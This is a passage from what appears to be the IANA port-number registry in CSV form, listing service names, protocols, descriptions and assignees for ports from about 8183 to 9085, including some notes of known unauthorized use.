Manager,[Ron_Passerini],[Ron_Passerini],2010-04-27,,,,, proremote,8183,tcp,ProRemote,[Alex_Lelievre],[Alex_Lelievre],2009-08-18,,,,, ,8183,udp,Reserved,,,,,,,, itach,8184,tcp,Remote iTach Connection,[Barend_Jacobus_van_d],[Barend_Jacobus_van_d],2010-04-27,,,,, itach,8184,udp,Remote iTach Connection,[Barend_Jacobus_van_d],[Barend_Jacobus_van_d],2010-04-27,,,,, ,8185-8190,,Unassigned,,,,,,,, limnerpressure,8191,tcp,Limner Pressure,[Aaron_Kleinsteiber],[Aaron_Kleinsteiber],2014-01-16,,,,, ,8191,udp,Reserved,,,,,,,, spytechphone,8192,tcp,SpyTech Phone Service,[Bill_Kay],[Bill_Kay],2006-04,,,,, spytechphone,8192,udp,SpyTech Phone Service,[Bill_Kay],[Bill_Kay],2006-04,,,,, ,8193,,Unassigned,,,,,,,, blp1,8194,tcp,Bloomberg data API,[Albert_Hou],[Albert_Hou],2006-05,,,,, blp1,8194,udp,Bloomberg data API,[Albert_Hou],[Albert_Hou],2006-05,,,,, blp2,8195,tcp,Bloomberg feed,[Albert_Hou],[Albert_Hou],2006-05,,,,, blp2,8195,udp,Bloomberg feed,[Albert_Hou],[Albert_Hou],2006-05,,,,, ,8196-8198,,Unassigned,,,,,,,, vvr-data,8199,tcp,VVR DATA,[Ming_Xu],[Ming_Xu],,,,,, vvr-data,8199,udp,VVR DATA,[Ming_Xu],[Ming_Xu],,,,,, trivnet1,8200,tcp,TRIVNET,[Saar_Wilf],[Saar_Wilf],,,,,, trivnet1,8200,udp,TRIVNET,[Saar_Wilf],[Saar_Wilf],,,,,, trivnet2,8201,tcp,TRIVNET,[Saar_Wilf],[Saar_Wilf],,,,,, trivnet2,8201,udp,TRIVNET,[Saar_Wilf],[Saar_Wilf],,,,,, ,8202,tcp,Reserved,,,,,,,, aesop,8202,udp,Audio+Ethernet Standard Open Protocol,[POWERSOFT_SRL],[Paolo_Desii][Claudio_Lastrucci],2012-01-03,,,,, ,8203-8203,,Unassigned,,,,,,,, lm-perfworks,8204,tcp,LM Perfworks,[Chris_Flynn],[Chris_Flynn],,,,,, lm-perfworks,8204,udp,LM Perfworks,[Chris_Flynn],[Chris_Flynn],,,,,, lm-instmgr,8205,tcp,LM Instmgr,[Chris_Flynn],[Chris_Flynn],,,,,, lm-instmgr,8205,udp,LM Instmgr,[Chris_Flynn],[Chris_Flynn],,,,,, lm-dta,8206,tcp,LM Dta,[Chris_Flynn],[Chris_Flynn],,,,,, lm-dta,8206,udp,LM Dta,[Chris_Flynn],[Chris_Flynn],,,,,, lm-sserver,8207,tcp,LM SServer,[Chris_Flynn],[Chris_Flynn],,,,,, lm-sserver,8207,udp,LM SServer,[Chris_Flynn],[Chris_Flynn],,,,,, lm-webwatcher,8208,tcp,LM Webwatcher,[Chris_Flynn],[Chris_Flynn],,,,,, lm-webwatcher,8208,udp,LM Webwatcher,[Chris_Flynn],[Chris_Flynn],,,,,, ,8209-8229,,Unassigned,,,,,,,, rexecj,8230,tcp,RexecJ Server,[Curtiss_Howard],[Curtiss_Howard],2004-11,,,,, rexecj,8230,udp,RexecJ Server,[Curtiss_Howard],[Curtiss_Howard],2004-11,,,,, ,8231-8242,,Unassigned,,,,,,,, synapse-nhttps,8243,tcp,Synapse Non Blocking HTTPS,[Ruwan_Linton],[Ruwan_Linton],2008-07-10,,,,, synapse-nhttps,8243,udp,Synapse Non Blocking HTTPS,[Ruwan_Linton],[Ruwan_Linton],2008-07-10,,,,, ,8244-8275,,Unassigned,,,,,,,, pando-sec,8276,tcp,Pando Media Controlled Distribution,[Laird_Popkin],[Laird_Popkin],2008-02-27,,,,, pando-sec,8276,udp,Pando Media Controlled Distribution,[Laird_Popkin],[Laird_Popkin],2008-02-27,,,,, ,8277-8279,,Unassigned,,,,,,,, synapse-nhttp,8280,tcp,Synapse Non Blocking HTTP,[Ruwan_Linton],[Ruwan_Linton],2008-06-05,,,,, synapse-nhttp,8280,udp,Synapse Non Blocking HTTP,[Ruwan_Linton],[Ruwan_Linton],2008-06-05,,,,, ,8281-8291,,Unassigned,,,,,,,, blp3,8292,tcp,Bloomberg professional,[Albert_Hou],[Albert_Hou],2006-05,,,,, blp3,8292,udp,Bloomberg professional,[Albert_Hou],[Albert_Hou],2006-05,,,,, hiperscan-id,8293,tcp,Hiperscan Identification Service,[Thomas_Klose],[Thomas_Klose],2009-12-15,,,,, ,8293,udp,Reserved,,,,,,,, blp4,8294,tcp,Bloomberg intelligent client,[Albert_Hou],[Albert_Hou],2006-05,,,,, blp4,8294,udp,Bloomberg intelligent client,[Albert_Hou],[Albert_Hou],2006-05,,,,, ,8295-8299,,Unassigned,,,,,,,, tmi,8300,tcp,Transport Management Interface,[Steve_Kneizys],[Steve_Kneizys],2006-11,,,,, tmi,8300,udp,Transport Management Interface,[Steve_Kneizys],[Steve_Kneizys],2006-11,,,,, amberon,8301,tcp,Amberon PPC/PPS,[Ronald_Snyder],[Ronald_Snyder],2006-03,,,,, amberon,8301,udp,Amberon PPC/PPS,[Ronald_Snyder],[Ronald_Snyder],2006-03,,,,, ,8302-8312,,Unassigned,,,,,,,, hub-open-net,8313,tcp,Hub Open Network,[Grexie],[Tim_Behrsin],2012-06-13,,,,,Defined TXT keys: _hub._tcp.host.example.com ,8313,udp,Reserved,,,,,,,, ,8314-8319,,Unassigned,,,,,,,, tnp-discover,8320,tcp,Thin(ium) Network Protocol,[Aly_Orady],[Aly_Orady],2007-08-07,,,,, tnp-discover,8320,udp,Thin(ium) Network Protocol,[Aly_Orady],[Aly_Orady],2007-08-07,,,,, tnp,8321,tcp,Thin(ium) Network Protocol,[Aly_Orady],[Aly_Orady],2007-08-07,,,,, tnp,8321,udp,Thin(ium) Network Protocol,[Aly_Orady],[Aly_Orady],2007-08-07,,,,, ,8322-8350,,Unassigned,,,,,,,, server-find,8351,tcp,Server Find,[Chris_Brown],[Chris_Brown],,,,,, server-find,8351,udp,Server Find,[Chris_Brown],[Chris_Brown],,,,,, ,8352-8375,,Unassigned,,,,,,,, cruise-enum,8376,tcp,Cruise ENUM,[Steve_Husak],[Steve_Husak],,,,,, cruise-enum,8376,udp,Cruise ENUM,[Steve_Husak],[Steve_Husak],,,,,, cruise-swroute,8377,tcp,Cruise SWROUTE,[Steve_Husak],[Steve_Husak],,,,,, cruise-swroute,8377,udp,Cruise SWROUTE,[Steve_Husak],[Steve_Husak],,,,,, cruise-config,8378,tcp,Cruise CONFIG,[Steve_Husak],[Steve_Husak],,,,,, cruise-config,8378,udp,Cruise CONFIG,[Steve_Husak],[Steve_Husak],,,,,, cruise-diags,8379,tcp,Cruise DIAGS,[Steve_Husak],[Steve_Husak],,,,,, cruise-diags,8379,udp,Cruise DIAGS,[Steve_Husak],[Steve_Husak],,,,,, cruise-update,8380,tcp,Cruise UPDATE,[Steve_Husak],[Steve_Husak],,,,,, cruise-update,8380,udp,Cruise UPDATE,[Steve_Husak],[Steve_Husak],,,,,, ,8381-8382,,Unassigned,,,,,,,, m2mservices,8383,tcp,M2m Services,[Carlos_Arteaga_2],[Carlos_Arteaga_2],2004-11,,,,, m2mservices,8383,udp,M2m Services,[Carlos_Arteaga_2],[Carlos_Arteaga_2],2004-11,,,,, ,8384-8399,,Unassigned,,,,,,,, cvd,8400,tcp,cvd,[Aaron_Bilbrey],[Aaron_Bilbrey],,,,,, cvd,8400,udp,cvd,[Aaron_Bilbrey],[Aaron_Bilbrey],,,,,, sabarsd,8401,tcp,sabarsd,[Aaron_Bilbrey],[Aaron_Bilbrey],,,,,, sabarsd,8401,udp,sabarsd,[Aaron_Bilbrey],[Aaron_Bilbrey],,,,,, abarsd,8402,tcp,abarsd,[Aaron_Bilbrey],[Aaron_Bilbrey],,,,,, abarsd,8402,udp,abarsd,[Aaron_Bilbrey],[Aaron_Bilbrey],,,,,, admind,8403,tcp,admind,[Aaron_Bilbrey],[Aaron_Bilbrey],,,,,, admind,8403,udp,admind,[Aaron_Bilbrey],[Aaron_Bilbrey],,,,,, svcloud,8404,tcp,SuperVault Cloud,[Nine_Technology_LLC],[Alex_Stoev],2009-09-14,2011-08-01,,,, ,8404,udp,Reserved,,,,,,,, svbackup,8405,tcp,SuperVault Backup,[Nine_Technology_LLC],[Alex_Stoev],2009-09-14,2011-08-01,,,, ,8405,udp,Reserved,,,,,,,, ,8406-8414,,Unassigned,,,,,,,, dlpx-sp,8415,tcp,Delphix Session Protocol,[Delphix_Corp],[Peng_Dai],2012-11-01,,,,, ,8415,udp,Reserved,,,,,,,, espeech,8416,tcp,eSpeech Session Protocol,[Scott_Tarone],[Scott_Tarone],2002-11,,,,, espeech,8416,udp,eSpeech Session Protocol,[Scott_Tarone],[Scott_Tarone],2002-11,,,,, espeech-rtp,8417,tcp,eSpeech RTP Protocol,[Scott_Tarone],[Scott_Tarone],2003-04,,,,, espeech-rtp,8417,udp,eSpeech RTP Protocol,[Scott_Tarone],[Scott_Tarone],2003-04,,,,, ,8418-8441,,Unassigned,,,,,,,, cybro-a-bus,8442,tcp,CyBro A-bus Protocol,[Damir_Skrjanec],[Damir_Skrjanec],2007-05,,,,, cybro-a-bus,8442,udp,CyBro A-bus Protocol,[Damir_Skrjanec],[Damir_Skrjanec],2007-05,,,,, pcsync-https,8443,tcp,PCsync HTTPS,,,,,,,, pcsync-https,8443,udp,PCsync HTTPS,,,,,,,, pcsync-http,8444,tcp,PCsync HTTP,[Katy_Lynn_McCullough],[Katy_Lynn_McCullough],,,,,, pcsync-http,8444,udp,PCsync HTTP,[Katy_Lynn_McCullough],[Katy_Lynn_McCullough],,,,,, copy,8445,tcp,Port for copy peer sync feature,[Copy],[Jason_Dictos],2012-09-19,,,,, copy-disc,8445,udp,Port for copy discovery,[Copy],[Jason_Dictos],2012-09-19,,,,, ,8446-8449,,Unassigned,,,,,,,, npmp,8450,tcp,npmp,[Ian_Chard],[Ian_Chard],,,,,, npmp,8450,udp,npmp,[Ian_Chard],[Ian_Chard],,,,,, ,8451-8456,,Unassigned,,,,,,,, nexentamv,8457,tcp,Nexenta Management GUI,[Nexenta],[Andrew_Galloway],2012-12-07,,,,, ,8457,udp,Reserved,,,,,,,, ,8458-8469,,Unassigned,,,,,,,, cisco-avp,8470,tcp,Cisco Address Validation Protocol,[Cullen_Jennings],[Cullen_Jennings],2009-02-13,,,,, ,8470,udp,Reserved,,,,,,,, pim-port,8471,tcp,PIM over Reliable Transport,[IESG],[IETF_Chair],2008-08-21,,[RFC6559],,, pim-port,8471,sctp,PIM over Reliable Transport,[IESG],[IETF_Chair],2008-08-21,,[RFC6559],,, ,8471,udp,Reserved,,,,,,,, otv,8472,tcp,Overlay Transport Virtualization (OTV),[Dino_Farinacci],[Dino_Farinacci],2008-01-07,,,,, otv,8472,udp,Overlay Transport Virtualization (OTV),[Dino_Farinacci],[Dino_Farinacci],2008-01-07,,,,, vp2p,8473,tcp,Virtual Point to Point,[Jerome_Grimbert],[Jerome_Grimbert],,,,,, vp2p,8473,udp,Virtual Point to Point,[Jerome_Grimbert],[Jerome_Grimbert],,,,,, noteshare,8474,tcp,AquaMinds NoteShare,[Michael_McNabb],[Michael_McNabb],2005-10,,,,, noteshare,8474,udp,AquaMinds NoteShare,[Michael_McNabb],[Michael_McNabb],2005-10,,,,, ,8475-8499,,Unassigned,,,,,,,, fmtp,8500,tcp,Flight Message Transfer Protocol,[Eivan_Cerasi],[Eivan_Cerasi],2003-12,,,,, fmtp,8500,udp,Flight Message Transfer Protocol,[Eivan_Cerasi],[Eivan_Cerasi],2003-12,,,,, cmtp-mgt,8501,tcp,CYTEL Message Transfer Management,,,,,,,, cmtp-av,8501,udp,CYTEL Message Transfer Audio and Video,[Frank_Jakel],[Frank_Jakel],2011-04-29,,,,, ftnmtp,8502,tcp,FTN Message Transfer Protocol,[Yuri_Myakotin],[Yuri_Myakotin],2014-01-07,,,,, ,8502,udp,Reserved,,,,,,,, ,8503-8553,,Unassigned,,,,,,,, rtsp-alt,8554,tcp,RTSP Alternate (see port 554),[Stephen_Casner_2],[Stephen_Casner_2],,,,,, rtsp-alt,8554,udp,RTSP Alternate (see port 554),[Stephen_Casner_2],[Stephen_Casner_2],,,,,, d-fence,8555,tcp,SYMAX D-FENCE,[Thomas_Geisel],[Thomas_Geisel],2003-01,,,,, d-fence,8555,udp,SYMAX D-FENCE,[Thomas_Geisel],[Thomas_Geisel],2003-01,,,,, ,8556-8566,,Unassigned,,,,,,,, enc-tunnel,8567,tcp,EMIT tunneling protocol,[Panasonic_Intranet_Panasonic_North_America_PEWLA],[Bryant_Eastham],2005-08,2012-11-12,,,, enc-tunnel,8567,udp,EMIT tunneling protocol,[Panasonic_Intranet_Panasonic_North_America_PEWLA],[Bryant_Eastham],2005-08,2012-11-12,,,, ,8568-8599,,Unassigned,,,,,,,, asterix,8600,tcp,Surveillance Data,[Eivan_Cerasi],[Eivan_Cerasi],2005-11,,,,, asterix,8600,udp,Surveillance Data,[Eivan_Cerasi],[Eivan_Cerasi],2005-11,,,,, ,8601-8608,,Unassigned,,,,,,,, ,8609,tcp,Reserved,,,,,,,, canon-cpp-disc,8609,udp,Canon Compact Printer Protocol Discovery,[Canon_Inc],[Ryusuke_Okuhara],2012-06-08,2012-06-15,,,, canon-mfnp,8610,tcp,Canon MFNP Service,[Ritsuto_Sako],[Ritsuto_Sako],2009-05-04,,,,, canon-mfnp,8610,udp,Canon MFNP Service,[Ritsuto_Sako],[Ritsuto_Sako],2009-05-04,,,,, canon-bjnp1,8611,tcp,Canon BJNP Port 1,[Atsushi_Nakamura],[Atsushi_Nakamura],2003-11,,,,, canon-bjnp1,8611,udp,Canon BJNP Port 1,[Atsushi_Nakamura],[Atsushi_Nakamura],2003-11,,,,, canon-bjnp2,8612,tcp,Canon BJNP Port 2,[Atsushi_Nakamura],[Atsushi_Nakamura],2003-11,,,,, canon-bjnp2,8612,udp,Canon BJNP Port 2,[Atsushi_Nakamura],[Atsushi_Nakamura],2003-11,,,,, canon-bjnp3,8613,tcp,Canon BJNP Port 3,[Atsushi_Nakamura],[Atsushi_Nakamura],2003-11,,,,, canon-bjnp3,8613,udp,Canon BJNP Port 3,[Atsushi_Nakamura],[Atsushi_Nakamura],2003-11,,,,, canon-bjnp4,8614,tcp,Canon BJNP Port 4,[Atsushi_Nakamura],[Atsushi_Nakamura],2003-11,,,,, canon-bjnp4,8614,udp,Canon BJNP Port 4,[Atsushi_Nakamura],[Atsushi_Nakamura],2003-11,,,,, imink,8615,tcp,Imink Service Control,[Canon_Inc],[KEN_ICHI_FUJII],2011-10-10,,,,, ,8615,udp,Reserved,,,,,,,, ,8616-8664,,Unassigned,,,,,,,Unauthorized Use Known on ports 8616 and 8617, monetra,8665,tcp,Monetra,[Main_Street_Softworks],[Brad_House],2013-04-02,,,,, ,8665,udp,Reserved,,,,,,,, monetra-admin,8666,tcp,Monetra Administrative Access,[Main_Street_Softworks],[Brad_House],2013-04-02,,,,, ,8666,udp,Reserved,,,,,,,, ,8667-8674,,Unassigned,,,,,,,, msi-cps-rm,8675,tcp,Motorola Solutions Customer Programming Software for Radio Management,[Motorola_Solutions_Inc],[Jenish_Amin],2012-03-14,,,,, msi-cps-rm-disc,8675,udp,Motorola Solutions Customer Programming Software for Radio Management Discovery,[Motorola_Solutions_Inc],[Jenish_Amin],2012-03-14,,,,, ,8676-8685,,Unassigned,,,,,,,, sun-as-jmxrmi,8686,tcp,Sun App Server - JMX/RMI,[Abhijit_Kumar],[Abhijit_Kumar],2005-11,,,,, sun-as-jmxrmi,8686,udp,Sun App Server - JMX/RMI,[Abhijit_Kumar],[Abhijit_Kumar],2005-11,,,,, ,8687,,Unassigned,,,,,,,, openremote-ctrl,8688,tcp,OpenRemote Controller HTTP/REST,[OpenRemote_Inc],[Juha_Lindfors],2012-12-18,,,,, ,8688,udp,Reserved,,,,,,,, ,8689-8698,,Unassigned,,,,,,,, vnyx,8699,tcp,VNYX Primary Port,[Gregg_Green],[Gregg_Green],2004-11,,,,, ,8699,udp,Reserved,,,2004-11,2013-05-24,,,,This entry is being removed on 2013-05-24. ,8700-8710,,Unassigned,,,,,,,, nvc,8711,tcp,Nuance Voice Control,[Nuance_Communications_Inc2],[Diego_Negre],2012-10-05,,,,, ,8711,udp,Reserved,,,,,,,, ,8712-8731,,Unassigned,,,,,,,, ,8732,tcp,Reserved,,,,,,,, dtp-net,8732,udp,DASGIP Net Services,[Dr_Matthias_Arnold],[Dr_Matthias_Arnold],2009-03-23,,,,, ibus,8733,tcp,iBus,[Silvano_Maffeis],[Silvano_Maffeis],,,,,, ibus,8733,udp,iBus,[Silvano_Maffeis],[Silvano_Maffeis],,,,,, ,8734-8749,,Unassigned,,,,,,,, dey-keyneg,8750,tcp,DEY Storage Key Negotiation,[DEY_Storage_Systems_Inc],[Garrett_D_Amore],2013-03-01,,,,, ,8750,udp,Reserved,,,,,,,, ,8751-8762,,Unassigned,,,,,,,, mc-appserver,8763,tcp,MC-APPSERVER,[Romeo_Kasanwidjojo],[Romeo_Kasanwidjojo],,,,,, mc-appserver,8763,udp,MC-APPSERVER,[Romeo_Kasanwidjojo],[Romeo_Kasanwidjojo],,,,,, openqueue,8764,tcp,OPENQUEUE,[Matt_Jensen],[Matt_Jensen],,,,,, openqueue,8764,udp,OPENQUEUE,[Matt_Jensen],[Matt_Jensen],,,,,, ultraseek-http,8765,tcp,Ultraseek HTTP,[Walter_Underwood],[Walter_Underwood],,,,,, ultraseek-http,8765,udp,Ultraseek HTTP,[Walter_Underwood],[Walter_Underwood],,,,,, amcs,8766,tcp,Agilent Connectivity Service,[Agilent_Technologies_Inc],[Tom_Fay],2013-01-16,,,,, amcs,8766,udp,Agilent Connectivity Service,[Agilent_Technologies_Inc],[Tom_Fay],2013-01-16,,,,, ,8767-8769,,Unassigned,,,,,,,, dpap,8770,tcp,Digital Photo Access Protocol (iPhoto),[Amandeep_Jawa_2],[Amandeep_Jawa_2],2004-11,,,,,"Defined TXT keys: txtvers, Version, iPSh Version, Machine ID, Machine Name, Password" dpap,8770,udp,Digital Photo Access Protocol (iPhoto),[Amandeep_Jawa_2],[Amandeep_Jawa_2],2004-11,,,,,"Defined TXT keys: txtvers, Version, iPSh Version, Machine ID, Machine Name, Password" ,8771-8777,,Unassigned,,,,,,,, uec,8778,tcp,Stonebranch Universal Enterprise Controller,[Stonebranch_Inc],[Nathan_Hammond_2],2013-06-25,,,,, ,8778,udp,Reserved,,,,,,,, ,8779-8785,,Unassigned,,,,,,,, msgclnt,8786,tcp,Message Client,,,,,,,, msgclnt,8786,udp,Message Client,,,,,,,, msgsrvr,8787,tcp,Message Server,[Michael_O_Brien],[Michael_O_Brien],2003-03,,,,, msgsrvr,8787,udp,Message Server,[Michael_O_Brien],[Michael_O_Brien],2003-03,,,,, ,8788-8792,,Unassigned,,,,,,,, acd-pm,8793,tcp,Accedian Performance Measurement,[Marco_Mascitto],[Marco_Mascitto],,,,,, acd-pm,8793,udp,Accedian Performance Measurement,[Marco_Mascitto],[Marco_Mascitto],,,,,, ,8794-8799,,Unassigned,,,,,,,, sunwebadmin,8800,tcp,Sun Web Server Admin Service,[Jyri_J_Virkki],[Jyri_J_Virkki],2005-12,,,,, sunwebadmin,8800,udp,Sun Web Server Admin Service,[Jyri_J_Virkki],[Jyri_J_Virkki],2005-12,,,,, ,8801-8803,,Unassigned,,,,,,,Known UNAUTHORIZED USE: Port 8801, truecm,8804,tcp,truecm,[Scott_Kramer],[Scott_Kramer],,,,,, truecm,8804,udp,truecm,[Scott_Kramer],[Scott_Kramer],,,,,, ,8805-8872,,Unassigned,,,,,,,, dxspider,8873,tcp,dxspider linking protocol,[Dirk_Koopman],[Dirk_Koopman],2005-08,,,,, dxspider,8873,udp,dxspider linking protocol,[Dirk_Koopman],[Dirk_Koopman],2005-08,,,,, ,8874-8879,,Unassigned,,,,,,,, cddbp-alt,8880,tcp,CDDBP,[Steve_Scherf],[Steve_Scherf],,,,,, cddbp-alt,8880,udp,CDDBP,[Steve_Scherf],[Steve_Scherf],,,,,, galaxy4d,8881,tcp,Galaxy4D Online Game Engine,[Galaxy4D],[Olivier_St-Laurent],2012-06-18,,,,, ,8881,udp,Reserved,,,,,,,, ,8882,,Unassigned,,,,,,,Unauthorized Use Known on port 8882, secure-mqtt,8883,tcp,Secure MQTT,[Arthur_Barr],[Arthur_Barr],2008-02-27,,,,, secure-mqtt,8883,udp,Secure MQTT,[Arthur_Barr],[Arthur_Barr],2008-02-27,,,,, ,8884-8887,,Unassigned,,,,,,,, ddi-tcp-1,8888,tcp,NewsEDGE server TCP (TCP 1),[Fred_Yao],[Fred_Yao],,,,,Known Unauthorized Use on port 8888, ddi-udp-1,8888,udp,NewsEDGE server UDP (UDP 1),[Fred_Yao],[Fred_Yao],,,,,Known Unauthorized Use on port 8888, ddi-tcp-2,8889,tcp,Desktop Data TCP 1,[Fred_Yao],[Fred_Yao],,,,,Known Unauthorized Use on port 8889, ddi-udp-2,8889,udp,NewsEDGE server broadcast,[Fred_Yao],[Fred_Yao],,,,,Known Unauthorized Use on port 8889, ddi-tcp-3,8890,tcp,Desktop Data TCP 2,[Fred_Yao],[Fred_Yao],,,,,Known Unauthorized Use on port 8890, ddi-udp-3,8890,udp,NewsEDGE client broadcast,[Fred_Yao],[Fred_Yao],,,,,Known Unauthorized Use on port 8890, ddi-tcp-4,8891,tcp,Desktop Data TCP 3: NESS application,[Fred_Yao],[Fred_Yao],,,,,, ddi-udp-4,8891,udp,Desktop Data UDP 3: NESS application,[Fred_Yao],[Fred_Yao],,,,,, ddi-tcp-5,8892,tcp,Desktop Data TCP 4: FARM product,[Fred_Yao],[Fred_Yao],,,,,, ddi-udp-5,8892,udp,Desktop Data UDP 4: FARM product,[Fred_Yao],[Fred_Yao],,,,,, ddi-tcp-6,8893,tcp,Desktop Data TCP 5: NewsEDGE/Web application,[Fred_Yao],[Fred_Yao],,,,,, ddi-udp-6,8893,udp,Desktop Data UDP 5: NewsEDGE/Web application,[Fred_Yao],[Fred_Yao],,,,,, ddi-tcp-7,8894,tcp,Desktop Data TCP 6: COAL application,[Fred_Yao],[Fred_Yao],,,,,, ddi-udp-7,8894,udp,Desktop Data UDP 6: COAL application,[Fred_Yao],[Fred_Yao],,,,,, ,8895-8898,,Unassigned,,,,,,,, ospf-lite,8899,tcp,ospf-lite,[Matthew_Thomas],[Matthew_Thomas],2008-01-07,,,,, ospf-lite,8899,udp,ospf-lite,[Matthew_Thomas],[Matthew_Thomas],2008-01-07,,,,, jmb-cds1,8900,tcp,JMB-CDS 1,[Curtis_Bray],[Curtis_Bray],,,,,, jmb-cds1,8900,udp,JMB-CDS 1,[Curtis_Bray],[Curtis_Bray],,,,,, jmb-cds2,8901,tcp,JMB-CDS 2,[Curtis_Bray],[Curtis_Bray],,,,,, jmb-cds2,8901,udp,JMB-CDS 2,[Curtis_Bray],[Curtis_Bray],,,,,, ,8902-8909,,Unassigned,,,,,,,, manyone-http,8910,tcp,manyone-http,[Matt_King],[Matt_King],2002-04,,,,, manyone-http,8910,udp,manyone-http,[Matt_King],[Matt_King],2002-04,,,,, manyone-xml,8911,tcp,manyone-xml,[Matt_King],[Matt_King],2002-04,,,,, manyone-xml,8911,udp,manyone-xml,[Matt_King],[Matt_King],2002-04,,,,, wcbackup,8912,tcp,Windows Client Backup,[Jim_Lyon],[Jim_Lyon],2005-11,,,,, wcbackup,8912,udp,Windows Client Backup,[Jim_Lyon],[Jim_Lyon],2005-11,,,,, dragonfly,8913,tcp,Dragonfly System Service,[Paul_Hodara],[Paul_Hodara],2005-11,,,,, dragonfly,8913,udp,Dragonfly System Service,[Paul_Hodara],[Paul_Hodara],2005-11,,,,, ,8914-8936,,Unassigned,,,,,,,, twds,8937,tcp,Transaction Warehouse Data Service,[Lance_M_Steenson],[Lance_M_Steenson],2009-09-18,,,,, ,8937,udp,Reserved,,,,,,,, ,8938-8952,,Unassigned,,,,,,,, ub-dns-control,8953,tcp,unbound dns nameserver control,[NLnet_Labs_Support],[NLnet_Labs_Support],2011-05-10,2011-07-11,,,, ,8953,udp,Reserved,,,,,,,, cumulus-admin,8954,tcp,Cumulus Admin Port,[Thomas_Schleu],[Thomas_Schleu],,,,,, cumulus-admin,8954,udp,Cumulus Admin Port,[Thomas_Schleu],[Thomas_Schleu],,,,,, ,8955-8988,,Unassigned,,,,,,,, sunwebadmins,8989,tcp,Sun Web Server SSL Admin Service,[Jyri_J_Virkki],[Jyri_J_Virkki],2005-12,,,,, sunwebadmins,8989,udp,Sun Web Server SSL Admin Service,[Jyri_J_Virkki],[Jyri_J_Virkki],2005-12,,,,, http-wmap,8990,tcp,webmail HTTP service,[Fred_Batty],[Fred_Batty],2007-12-03,,,,, http-wmap,8990,udp,webmail HTTP service,[Fred_Batty],[Fred_Batty],2007-12-03,,,,, https-wmap,8991,tcp,webmail HTTPS service,[Fred_Batty],[Fred_Batty],2007-12-03,,,,, https-wmap,8991,udp,webmail HTTPS service,[Fred_Batty],[Fred_Batty],2007-12-03,,,,, ,8992-8997,,Unassigned,,,,,,,, canto-roboflow,8998,tcp,Canto RoboFlow Control,[Canto],[Thomas_Schleu_2],2014-02-26,,,,, ,8998,udp,Reserved,,,,,,,, bctp,8999,tcp,Brodos Crypto Trade Protocol,[Alexander_Sahler],[Alexander_Sahler],2002-02,,,,, bctp,8999,udp,Brodos Crypto Trade Protocol,[Alexander_Sahler],[Alexander_Sahler],2002-02,,,,, cslistener,9000,tcp,CSlistener,[David_Jones],[David_Jones],,,,,, cslistener,9000,udp,CSlistener,[David_Jones],[David_Jones],,,,,, etlservicemgr,9001,tcp,ETL Service Manager,[Stephen_McCrea],[Stephen_McCrea],2002-03,,,,Known Unauthorized Use on port 9001, etlservicemgr,9001,udp,ETL Service Manager,[Stephen_McCrea],[Stephen_McCrea],2002-03,,,,Known Unauthorized Use on port 9001, dynamid,9002,tcp,DynamID authentication,[Jerome_Dusautois],[Jerome_Dusautois],2002-03,,,,, dynamid,9002,udp,DynamID authentication,[Jerome_Dusautois],[Jerome_Dusautois],2002-03,,,,, ,9003-9005,,Unassigned,,,,,,,, ,9006,,De-Commissioned Port,,,2000-02-24,,,,, ,9007,tcp,Reserved,,,,,,,, ogs-client,9007,udp,Open Grid Services Client,[Gareth_Nelson_2],[Gareth_Nelson_2],2008-08-22,,,,, ogs-server,9008,tcp,Open Grid Services Server,[Gareth_Nelson_2],[Gareth_Nelson_2],2008-08-22,,,,, ,9008,udp,Reserved,,,,,,,, pichat,9009,tcp,Pichat Server,[Mark_Seuffert],[Mark_Seuffert],2004-11,,,,, pichat,9009,udp,Pichat Server,[Mark_Seuffert],[Mark_Seuffert],2004-11,,,,, sdr,9010,tcp,Secure Data Replicator Protocol,[Sufyan_Almajali],[Sufyan_Almajali],2008-06-27,,,,, ,9010,udp,Reserved,,,,,,,, ,9011-9019,,Unassigned,,,,,,,, tambora,9020,tcp,TAMBORA,[Jason_van_Zyl],[Jason_van_Zyl],2002-03,,,,, tambora,9020,udp,TAMBORA,[Jason_van_Zyl],[Jason_van_Zyl],2002-03,,,,, panagolin-ident,9021,tcp,Pangolin Identification,[William_Benner_2],[William_Benner_2],2002-03,,,,, panagolin-ident,9021,udp,Pangolin Identification,[William_Benner_2],[William_Benner_2],2002-03,,,,, paragent,9022,tcp,PrivateArk Remote Agent,[Gal_Cucuy],[Gal_Cucuy],2002-03,,,,, paragent,9022,udp,PrivateArk Remote Agent,[Gal_Cucuy],[Gal_Cucuy],2002-03,,,,, swa-1,9023,tcp,Secure Web Access - 1,[Tim_McGranaghan],[Tim_McGranaghan],,,,,, swa-1,9023,udp,Secure Web Access - 1,[Tim_McGranaghan],[Tim_McGranaghan],,,,,, swa-2,9024,tcp,Secure Web Access - 2,[Tim_McGranaghan],[Tim_McGranaghan],,,,,, swa-2,9024,udp,Secure Web Access - 2,[Tim_McGranaghan],[Tim_McGranaghan],,,,,, swa-3,9025,tcp,Secure Web Access - 3,[Tim_McGranaghan],[Tim_McGranaghan],,,,,, swa-3,9025,udp,Secure Web Access - 3,[Tim_McGranaghan],[Tim_McGranaghan],,,,,, swa-4,9026,tcp,Secure Web Access - 4,[Tim_McGranaghan],[Tim_McGranaghan],,,,,, swa-4,9026,udp,Secure Web Access - 4,[Tim_McGranaghan],[Tim_McGranaghan],,,,,, ,9027-9049,,Unassigned,,,,,,,, versiera,9050,tcp,Versiera Agent Listener,[Frank_Pikelner],[Frank_Pikelner],2010-01-15,,,,, ,9050,udp,Reserved,,,,,,,, fio-cmgmt,9051,tcp,Fusion-io Central Manager Service,[Jim_Sermersheim],[Jim_Sermersheim],2010-01-15,,,,, ,9051,udp,Reserved,,,,,,,, ,9052-9079,,Unassigned,,,,,,,, glrpc,9080,tcp,Groove GLRPC,[Adrian_Popescu],[Adrian_Popescu],2002-09,,,,, glrpc,9080,udp,Groove GLRPC,[Adrian_Popescu],[Adrian_Popescu],2002-09,,,,, ,9081,,Unassigned,,,,,,,, lcs-ap,9082,sctp,LCS Application Protocol,[Kimmo_Kymalainen],[Kimmo_Kymalainen],2010-06-04,,,,, emc-pp-mgmtsvc,9083,tcp,EMC PowerPath Mgmt Service,[Jim_Perreault],[Jim_Perreault],2010-06-04,,,,, ,9083,udp,Reserved,,,,,,,, aurora,9084,tcp,IBM AURORA Performance Visualizer,[Jeroen_Massar_2],[Jeroen_Massar_2],2008-08-21,,,,, aurora,9084,udp,IBM AURORA Performance Visualizer,[Jeroen_Massar_2],[Jeroen_Massar_2],2008-08-21,,,,, aurora,9084,sctp,IBM AURORA Performance Visualizer,[Jeroen_Massar_2],[Jeroen_Massar_2],2008-08-21,,,,, ibm-rsyscon,9085,tcp,IBM Remote System 